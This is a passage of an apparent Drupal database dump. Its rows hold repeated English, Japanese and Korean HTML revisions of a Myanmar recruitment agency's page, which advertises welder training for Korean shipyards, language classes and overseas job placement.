•&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タイ、日本、韓国などで働きたい学生達のためにも英語など必要な場合に応じて、パソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビースをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 302, 'ko', 0, '<img data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" width=\"100%\" data-align=\"center\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 303, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 303, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タイ、日本、韓国などで働きたい学生達のためにも英語など必要な場合に応じて、パソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビースをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 303, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" data-align=\"center\" data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" width=\"100%\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국, 일본, 한국 등과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 310, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>2. Co-opening and teaching Korean, Japanese, Thailand and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 310, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タイ、日本、韓国などで働きたい学生達のためにも英語など必要な場合に応じて、パソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビースをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 310, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" data-align=\"center\" data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" width=\"100%\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국, 일본, 한국 등과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 311, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>2. Co-opening and teaching Korean, Japanese, Thailand and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
